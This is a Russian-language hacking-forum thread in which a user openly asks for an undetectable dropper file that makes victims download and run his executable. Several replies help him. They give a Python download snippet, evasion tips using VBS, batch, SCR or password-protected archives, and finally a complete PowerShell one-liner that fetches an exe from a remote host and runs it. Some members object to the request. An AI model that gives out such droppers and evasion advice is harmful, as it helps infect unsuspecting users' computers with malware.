• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Проблема Вопрос по подгрузу ехе

  • Автор темы GroveStreet
  • Дата начала
  • Теги
    vba
GroveStreet

GroveStreet

Member
16.06.2019
9
0
Нужно сделать файл, который подгрузит мой ехе, файл будет скачиваться через хром (нужно что бы не палился), раньше работали js вроде бы, где бы найти того кто сделает?
 
Последнее редактирование:
GroveStreet

GroveStreet

Member
16.06.2019
9
0
Или может есть другие варианты? Нужно что бы скачивался какой нибудь левый файл, который юзер потом запустит, главное не ехе.
 
Kotik_Begimotik

Kotik_Begimotik

Active member
29.12.2018
36
4
Если правильно понял, то так.
Код:
import urllib.request

print('Beginning file download with urllib2...')

url = 'http://google.com/one/two/file.exe' 
urllib.request.urlretrieve(url, '/Users/Admin/Downloads/cat.jpg')
 
Kotik_Begimotik

Kotik_Begimotik

Active member
29.12.2018
36
4
Вот еще есть примеры
 
Kotik_Begimotik

Kotik_Begimotik

Active member
29.12.2018
36
4
Чуть выше ошибся, пока переписывал.
Код:
import urllib.request

print('Beginning file download with urllib2...')

url = 'http://google.com/one/two/file.exe'
urllib.request.urlretrieve(url, '/Users/Admin/Downloads/file.exe')
 
GroveStreet

GroveStreet

Member
16.06.2019
9
0
как вариант - сделай самораспаковывающийся архив RAR.
если юзер и вправду юзер, то можно батник или заставку SCR
Спасибо за ответ.
Архив к сожалению не подойдёт тоже, а как сделать что бы батник скачивал и запускал файл с интернета? Я находил что то похожее, но там костыли какие то получались, наполовину ходячие)
 
Marylin

Marylin

Mod.Assembler
Red Team
05.06.2019
126
312
а как сделать что бы батник скачивал и запускал файл с интернета?
системная ком-строка не может такого,
нужно скачать и её потом вызывать батником.
примеры оформления есть по ссылке.
 
GroveStreet

GroveStreet

Member
16.06.2019
9
0
Чуть выше ошибся, пока переписывал.
Код:
import urllib.request

print('Beginning file download with urllib2...')

url = 'http://google.com/one/two/file.exe'
urllib.request.urlretrieve(url, '/Users/Admin/Downloads/file.exe')
О, только заметил. Проверю на компе завтра, спасибо. А это точно всё? Я видел примеры, там обычно побольше код.
 
Последнее редактирование:
centr

centr

Премиум
31.01.2017
414
409
Испольйте vbs скрипт если вам не важно сокрытие исходного кода, средствами vbs скачать файл из интернета вполне возможно.

Вариант с python не то что вам нужно, если конечно вы не уверены что на целевой хосте предустановлен интреперато python.

Так же как вариант можно использовать powershell, но более универсальным будет вариант с vbs.
 
mrOkey

mrOkey

Red Team
14.11.2017
619
715
Ухахах, ну да конечно, ехе файл юзер не запустит, а вот .ру и .bat запустит 😂😂😂 успехов)))
 
mrOkey

mrOkey

Red Team
14.11.2017
619
715
Чуть выше ошибся, пока переписывал.
Код:
import urllib.request

print('Beginning file download with urllib2...')

url = 'http://google.com/one/two/file.exe'
urllib.request.urlretrieve(url, '/Users/Admin/Downloads/file.exe')
Ну и конечно если надо просто скачать файл - это правильно. Но вот в 99% этот файл надо ещё запустить
 
GroveStreet

GroveStreet

Member
16.06.2019
9
0
Конечно, файл надо ещё и запустить.
Попробую разобраться с vbs, потрясу гугл на наличие готовых решений.
 
mrOkey

mrOkey

Red Team
14.11.2017
619
715
Автор не майся херью, всем очевидно, что ты не в образовательных целях спрашиваешь.
 
GroveStreet

GroveStreet

Member
16.06.2019
9
0
А разве это не хацкерский форум? Я сразу в первом посте сказал что бы файл не палился, по-моему это было сразу очевидно.
По теме - все паблик решения палятся всем чем можно, может нужно делать какую то обфускацию, я не знаю и я не спец. Я знаю что были сервисы на экспе которые делали js файлы для спама, к сожалению доступ на форум утратил. Но уверен что такие умельцы ещё есть.
 
mrOkey

mrOkey

Red Team
14.11.2017
619
715
А разве это не хацкерский форум?
Это форум специалистов по информационной безопасности. Надеюсь ты уловил разницу. Тут существуют люди работающие в однобуквенных, трехбуквенных и пятибуквенных учреждений РФ
 
GroveStreet

GroveStreet

Member
16.06.2019
9
0
Такие люди на каждом хак форуме есть. И не только хак.
Ну ок, значит тут мне не помогут провести аудит моих работников в компании, а жаль :( Поищу в другом месте.
 
Nobuf

Nobuf

Member
20.05.2019
21
9
поставь пароль на архив WinRAR и не будет палиться
 
gushmazuko

gushmazuko

Red Team
24.03.2017
159
388
Можно использовать PowerShell:
Код:
powershell (New-Object System.Net.WebClient).DownloadFile("http://192.168.0.1/file.exe","$env:temp\file.exe");[System.Diagnostics.Process]::Start("$env:temp\file.exe")
Скачивает и запускает.
 
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб